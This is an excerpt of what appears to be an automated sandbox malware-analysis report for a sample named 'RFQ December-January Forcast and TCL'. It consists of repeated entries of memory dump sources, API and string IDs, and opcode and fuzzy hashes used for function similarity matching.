                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: \*.*
                                                                                                            • API String ID: 2035342205-1173974218
                                                                                                            • Opcode ID: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                            • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                            • Opcode Fuzzy Hash: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                            • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
                                                                                                            • API String ID: 0-4051960142
                                                                                                            • Opcode ID: 89c78e9eae7b13d45153bdf9cbc6ec6f6d90c6c8325cc72c1b846db9342792af
                                                                                                            • Instruction ID: 9b240d49d21743f8e14fd5bd05a7c444bd07fa2568be0aa987d2a1d4f090d17a
                                                                                                            • Opcode Fuzzy Hash: 89c78e9eae7b13d45153bdf9cbc6ec6f6d90c6c8325cc72c1b846db9342792af
                                                                                                            • Instruction Fuzzy Hash: 33329FB4E012288FEB64CF65C954B9DBBF2BB89304F1084A9D909AB361DB355E85CF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
                                                                                                            • API String ID: 0-4051960142
                                                                                                            • Opcode ID: 0bcb25a72e560ae3fc21e96014877230a40d3b89f5dce0401aa9875cdb6a1f12
                                                                                                            • Instruction ID: ec7082a6b3694e5f4e4aee556a9d4bee2cb3d9daaad201816a029fd2838ecfa8
                                                                                                            • Opcode Fuzzy Hash: 0bcb25a72e560ae3fc21e96014877230a40d3b89f5dce0401aa9875cdb6a1f12
                                                                                                            • Instruction Fuzzy Hash: A602AFB4E002288FDB58CF65C994BDDBBF2BB89304F2085A9D549AB361DB355E85CF10
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
                                                                                                            • API String ID: 0-4051960142
                                                                                                            • Opcode ID: a6176c7462ba7878fdd020dc4cdfd3dfc065ef2952102482c40eac4365eebc2f
                                                                                                            • Instruction ID: 8f089ba2400e0d60a3d6c95f5b3298b534c49f3a2b94e82566b00c235c63747f
                                                                                                            • Opcode Fuzzy Hash: a6176c7462ba7878fdd020dc4cdfd3dfc065ef2952102482c40eac4365eebc2f
                                                                                                            • Instruction Fuzzy Hash: 7E029FB4E012288FDB58CF65C994BDDBBF2BB89304F2081A9D549AB361DB355E85CF10
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .5vq
                                                                                                            • API String ID: 0-493797296
                                                                                                            • Opcode ID: 22deebebf5490567bb6a0b765a2aea4f8f8c88b07d751794f5ae24951356c5c5
                                                                                                            • Instruction ID: 3254dac41c3d17b886cd1b02cb1dfbd630461925281c08b921ab6debdec73606
                                                                                                            • Opcode Fuzzy Hash: 22deebebf5490567bb6a0b765a2aea4f8f8c88b07d751794f5ae24951356c5c5
                                                                                                            • Instruction Fuzzy Hash: 69628B74E01228CFDB64DF69C884BDDBBB2BB89301F1085E9D449AB255DB359E82CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992571187.0000000036A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36a50000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5bc9dd45710c43aeee2cc1bdea1846d6c28667457088ce0e6e0474f8c5099075
                                                                                                            • Instruction ID: 6856a1aa2f030011ab74383391f03ed6d4097a7b3c855c7d95fe559c572d29ef
                                                                                                            • Opcode Fuzzy Hash: 5bc9dd45710c43aeee2cc1bdea1846d6c28667457088ce0e6e0474f8c5099075
                                                                                                            • Instruction Fuzzy Hash: 6BC1BD74E01218CFDB14DFA5C994B9DBBB2AF89301F2080A9D909BB355DB359A86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992571187.0000000036A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36a50000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 76afe2ebb44ec0c9bfc845bf0c48e8520d9cc0122ad966141cf5ddec961dc6b7
                                                                                                            • Instruction ID: b4e6de3edadc453ac300ce4dc4ab2f71dcf76bd75e8e57c7cc01264c831b8dcf
                                                                                                            • Opcode Fuzzy Hash: 76afe2ebb44ec0c9bfc845bf0c48e8520d9cc0122ad966141cf5ddec961dc6b7
                                                                                                            • Instruction Fuzzy Hash: 81C1AC74E01218CFDB14DFA5C994B9DBBB2AF89301F2080A9D909BB355DB359A82CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992571187.0000000036A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36a50000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ea8c4120bac08e3c5ec0438691a4dc5ca4841d6f0e84db630aefe4d33050c9d3
                                                                                                            • Instruction ID: 3ac5ad0e02748374cf3188cd4a13e8f7be557117e0664957c09265a9dc6c4cf8
                                                                                                            • Opcode Fuzzy Hash: ea8c4120bac08e3c5ec0438691a4dc5ca4841d6f0e84db630aefe4d33050c9d3
                                                                                                            • Instruction Fuzzy Hash: 13C1CE74E01218CFDB14DFA5C994B9DBBB2AF89300F2080A9D909BB355DB359E82CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992571187.0000000036A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36a50000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 99c45b8e418c82cf268190b2734f85038495f42792b5bfb7092587dbef53ea71
                                                                                                            • Instruction ID: 0e306cc537e3d7adf26c7415667aff6118aa0254cbfa3edc6fea708d3a78b246
                                                                                                            • Opcode Fuzzy Hash: 99c45b8e418c82cf268190b2734f85038495f42792b5bfb7092587dbef53ea71
                                                                                                            • Instruction Fuzzy Hash: 5BC1AD74E01218CFDB14DFA5C994B9DBBB2BF89300F2080A9D909BB355DB359A86CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992571187.0000000036A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36a50000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3c3c8693865b9b6ed579d83441d374eaf9ba69be5ca9732d0ae79c1f23dc743a
                                                                                                            • Instruction ID: 1428e392521d4a94f65df8948550d6e95e38fd124278ed0315ed2a7f7c2a2daa
                                                                                                            • Opcode Fuzzy Hash: 3c3c8693865b9b6ed579d83441d374eaf9ba69be5ca9732d0ae79c1f23dc743a
                                                                                                            • Instruction Fuzzy Hash: 88C1BF74E00218CFDB14DFA5C994B9DBBB2BF89301F2080A9D909BB355DB355A82CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992571187.0000000036A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36a50000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 406df0820d3b828da5ec58d877854b99a708f343ab6b7cc39d950eca58a58475
                                                                                                            • Instruction ID: af563c8112c9ff2ceb485da58d90a925bfb0359e1a0f3c8d2b1d76b10adcf610
                                                                                                            • Opcode Fuzzy Hash: 406df0820d3b828da5ec58d877854b99a708f343ab6b7cc39d950eca58a58475
                                                                                                            • Instruction Fuzzy Hash: 53C1CF74E01218CFDB14DFA5C994B9DBBB2AF89301F2080A9D909BB355DB359E82CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992571187.0000000036A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36a50000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d8d42261874764296b53691517bcb60d2c3de40d6597831fc7a23c43917ab318
                                                                                                            • Instruction ID: 0675809833d208a26771c7b3515bf835dab47459d22d8f027043954bd3eca290
                                                                                                            • Opcode Fuzzy Hash: d8d42261874764296b53691517bcb60d2c3de40d6597831fc7a23c43917ab318
                                                                                                            • Instruction Fuzzy Hash: 6AC1BC74E01218CFDB14DFA5C994B9DBBB2BF89300F2080A9D908BB355DB359A82CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992571187.0000000036A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36a50000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 856cfb5aba0c618e3926b44c16f5177c17feb9502573344f0e4c68ee7056edc5
                                                                                                            • Instruction ID: c07859458479fee9d1fd8deec1ceba5da049d5ebadcb62a4528c80434f90f513
                                                                                                            • Opcode Fuzzy Hash: 856cfb5aba0c618e3926b44c16f5177c17feb9502573344f0e4c68ee7056edc5
                                                                                                            • Instruction Fuzzy Hash: 60C1BE74E00218CFDB14DFA5C994B9DBBB2BF89301F2080A9D908BB355DB359A86CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 462c8f870603d4d343ec557056d0fc6f1b93141a0f19f4c023b9547f3dc6a78d
                                                                                                            • Instruction ID: 23a5fa7bde9d7bc7baa276d31dc958cd91005dbc30db949345bddeae95f48bf8
                                                                                                            • Opcode Fuzzy Hash: 462c8f870603d4d343ec557056d0fc6f1b93141a0f19f4c023b9547f3dc6a78d
                                                                                                            • Instruction Fuzzy Hash: 40C1AD74E01218CFDB14DFA5C994B9DBBB2BF89301F2081A9D809BB355DB359A86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e837fd89cf2244349ff9a0e05f6df9a94368e2a00f7414501f5ff15104ff34b8
                                                                                                            • Instruction ID: 2c31db91e2e8101a1a6cfba5aece79a13beefe551d118a935eed174d42712989
                                                                                                            • Opcode Fuzzy Hash: e837fd89cf2244349ff9a0e05f6df9a94368e2a00f7414501f5ff15104ff34b8
                                                                                                            • Instruction Fuzzy Hash: 1AC1BE74E01218CFDB14DFA5C994B9DBBB2BF89301F2081A9D908BB355DB359A86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 395aefda0001b059450ae4ea016d4f6995fd363b31ed6c034f2ef97923c0487a
                                                                                                            • Instruction ID: cecad002fe83809ebde07bac20a8c6172e4c2b7aa292d379b3813ffd0e61b9b0
                                                                                                            • Opcode Fuzzy Hash: 395aefda0001b059450ae4ea016d4f6995fd363b31ed6c034f2ef97923c0487a
                                                                                                            • Instruction Fuzzy Hash: 0DC1BD74E00218CFDB14DFA5C994B9DBBB2AF89300F2081A9D909BB355DB359E82CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c3009fca1c8d0a2d862eabdc70b7d57c9e0dc6456941b6a6849f9c25ab9280ac
                                                                                                            • Instruction ID: b8c1de0b9f0be5f9bdd41c3dc85321c9f423102b969a954e598eea36fd8657f1
                                                                                                            • Opcode Fuzzy Hash: c3009fca1c8d0a2d862eabdc70b7d57c9e0dc6456941b6a6849f9c25ab9280ac
                                                                                                            • Instruction Fuzzy Hash: 59C1A074E01218CFDB14DFA5C994B9DBBB2AF89301F2081A9D908BB355DB359E82CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 80af2b617e007aecf146490cd116ba381020f2cbdce7accccab1f18c9c92ce69
                                                                                                            • Instruction ID: fb6df5a65f7ff533b241f3c74e027c15b2ec4971d218873f48b2e6a8ab881c95
                                                                                                            • Opcode Fuzzy Hash: 80af2b617e007aecf146490cd116ba381020f2cbdce7accccab1f18c9c92ce69
                                                                                                            • Instruction Fuzzy Hash: 64C1B074E01218CFDB14DFA5C994B9DBBB2AF89300F2081A9D809BB355DB359E86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b70af9207f936a95a81db5cbbc7db61e9a0fa2df9ef0f325a74daca2025034a9
                                                                                                            • Instruction ID: d6623863c6d5e0f7e74f452b9502a2eeeda4266f6494c802131de47818ea53a5
                                                                                                            • Opcode Fuzzy Hash: b70af9207f936a95a81db5cbbc7db61e9a0fa2df9ef0f325a74daca2025034a9
                                                                                                            • Instruction Fuzzy Hash: 6CC1B074E00218CFDB14DFA5C994B9DBBB2AF89300F2081A9D909BB355DB359E82CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 57d3a66be8e3d5f5236318bb3b4a274292b7fda25f022dc6bc5e181655b62eff
                                                                                                            • Instruction ID: d37bd8af0716489188b2d1dfaa6c23986a9d6e9fa2973960939214e0af9c4af6
                                                                                                            • Opcode Fuzzy Hash: 57d3a66be8e3d5f5236318bb3b4a274292b7fda25f022dc6bc5e181655b62eff
                                                                                                            • Instruction Fuzzy Hash: 7AC1AF74E01218CFDB14DFA5C994B9DBBB2AF89301F2081A9D908BB355DB359E82CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8a61d6fc133fa085725f53b745ca021aa57cce13083c4cf7574d2ad4bac11913
                                                                                                            • Instruction ID: a8ee52d7b0645018fd56276fb8999140dd881edbde47a998b4490a1ef9306188
                                                                                                            • Opcode Fuzzy Hash: 8a61d6fc133fa085725f53b745ca021aa57cce13083c4cf7574d2ad4bac11913
                                                                                                            • Instruction Fuzzy Hash: 68C1BF74E00218CFDB14DFA5C994B9DBBB2AF89300F2081A9D909BB355DB359E86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2c8781df035b1ed43eb2167eeff93f8d1fdd4c39111d73fa4f3bf1fb9a750221
                                                                                                            • Instruction ID: 56bbfd71c7cb5ae52e8faf02d71be511e68234fe2ad23e571ef46b161994a6b4
                                                                                                            • Opcode Fuzzy Hash: 2c8781df035b1ed43eb2167eeff93f8d1fdd4c39111d73fa4f3bf1fb9a750221
                                                                                                            • Instruction Fuzzy Hash: 2DC1BE74E01218CFDB14DFA5C994B9DBBB2AF89301F2081A9D909BB354DB359E82CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9961e82726816110e582384cab15f3af450d44c2d7e188ca740ecb74b39033cc
                                                                                                            • Instruction ID: 552d4f4969ce0a868cbb695df7f6d8a08b20f6437ddab33bd7c11edeb40ff900
                                                                                                            • Opcode Fuzzy Hash: 9961e82726816110e582384cab15f3af450d44c2d7e188ca740ecb74b39033cc
                                                                                                            • Instruction Fuzzy Hash: BFC1BF74E01218CFDB14DFA5C994B9DBBB2AF89301F2081A9D908BB355DB359E82CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e85b151cfacffae7637b52741e07b0f7b971792ab409877fdbf6f8e337d1493a
                                                                                                            • Instruction ID: 4de2e6b23154b65993aafe0279b560a9032457191c55ee430c102c5be3510864
                                                                                                            • Opcode Fuzzy Hash: e85b151cfacffae7637b52741e07b0f7b971792ab409877fdbf6f8e337d1493a
                                                                                                            • Instruction Fuzzy Hash: C8C1AF74E01218CFDB14DFA5C994B9DBBB2AF89301F2081A9D909BB355DB359E82CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 72a96b14f28a5c2a9c2d7c9eeaf3935028644433ef71cc55a1257a5391614ad7
                                                                                                            • Instruction ID: 7161d46603d8278d8825b85a3e228c75143d6147c8fdf949afa47d0832b14366
                                                                                                            • Opcode Fuzzy Hash: 72a96b14f28a5c2a9c2d7c9eeaf3935028644433ef71cc55a1257a5391614ad7
                                                                                                            • Instruction Fuzzy Hash: 42C1B174E00228CFDB14DFA5C994B9DBBB2AF89300F2081A9D909BB354DB355E86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5b7ae48c418c4e7b84142bbb22ddef7a7e61cb00c7a72152a8a12d04cc7320d5
                                                                                                            • Instruction ID: 36a31dd3f73ddbd28e61628a43e1e44a6dfdcb7d971ab981512287c363c8092b
                                                                                                            • Opcode Fuzzy Hash: 5b7ae48c418c4e7b84142bbb22ddef7a7e61cb00c7a72152a8a12d04cc7320d5
                                                                                                            • Instruction Fuzzy Hash: 11C1BD74E01218CFDB14DFA5C994B9DBBB2AF89300F2081A9D908BB355DB359E86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a6513baf5001b53e65c99d6aea094d63d293f48f36000757f49644ce47c12fcb
                                                                                                            • Instruction ID: 664c3272f46424394e7265b31488ca4773b7802411946927f948c04925eb2e02
                                                                                                            • Opcode Fuzzy Hash: a6513baf5001b53e65c99d6aea094d63d293f48f36000757f49644ce47c12fcb
                                                                                                            • Instruction Fuzzy Hash: 41C1BF74E01218CFDB14DFA5C994B9DBBB2AF89301F2081A9D909BB355DB359E82CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 97d454a8506728d25bd239fa15562f157e944c1dee3ce87b2daa128c39c78a0d
                                                                                                            • Instruction ID: c5591ee505b06df0954ccfe45bdaa8f46c192c7e247c4cfdc923578740a99315
                                                                                                            • Opcode Fuzzy Hash: 97d454a8506728d25bd239fa15562f157e944c1dee3ce87b2daa128c39c78a0d
                                                                                                            • Instruction Fuzzy Hash: B3C1BE74E01218CFDB14DFA5C994B9DBBB2AF89301F2081A9D909BB355DB359E82CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6cd2f1e3180486f6064bfc516f107bb66a5b8272e91224cf2fcdd1ccea5abb93
                                                                                                            • Instruction ID: caa87b6e38219cc8e37c42debf6260f1714008c25cce8ce1d6b2ac3fe761bf3a
                                                                                                            • Opcode Fuzzy Hash: 6cd2f1e3180486f6064bfc516f107bb66a5b8272e91224cf2fcdd1ccea5abb93
                                                                                                            • Instruction Fuzzy Hash: ACC1AD74E01218CFDB14DFA5C994B9DBBB2BF89301F2081A9D908BB355DB359A86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c00250cbd10867fccc9e038b7583dff017e04f0655c3728a3777c5fa87fa33b2
                                                                                                            • Instruction ID: 49dadb75caab85b38bf38bca909443547306b50783b548c2393cad3de3f6e4e1
                                                                                                            • Opcode Fuzzy Hash: c00250cbd10867fccc9e038b7583dff017e04f0655c3728a3777c5fa87fa33b2
                                                                                                            • Instruction Fuzzy Hash: 4BC1AF74E01218CFDB14DFA5C994B9DBBB2AF89301F2081A9D909BB355DB359E82CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 28afd6ba87cdde4be24de3de741595bdfdffa056d71eb1ca9ba2b6bf0bab7f32
                                                                                                            • Instruction ID: deb8fe0caa7a7ca3c42674e19fafae718912c8f50f4a68dc0f0e46cb97ec7bf9
                                                                                                            • Opcode Fuzzy Hash: 28afd6ba87cdde4be24de3de741595bdfdffa056d71eb1ca9ba2b6bf0bab7f32
                                                                                                            • Instruction Fuzzy Hash: 7CC1AE74E01218CFDB14DFA5C994B9DBBB2BF89301F2081A9D908BB355DB359A82CF50
                                                                                                            Memory Dump Source
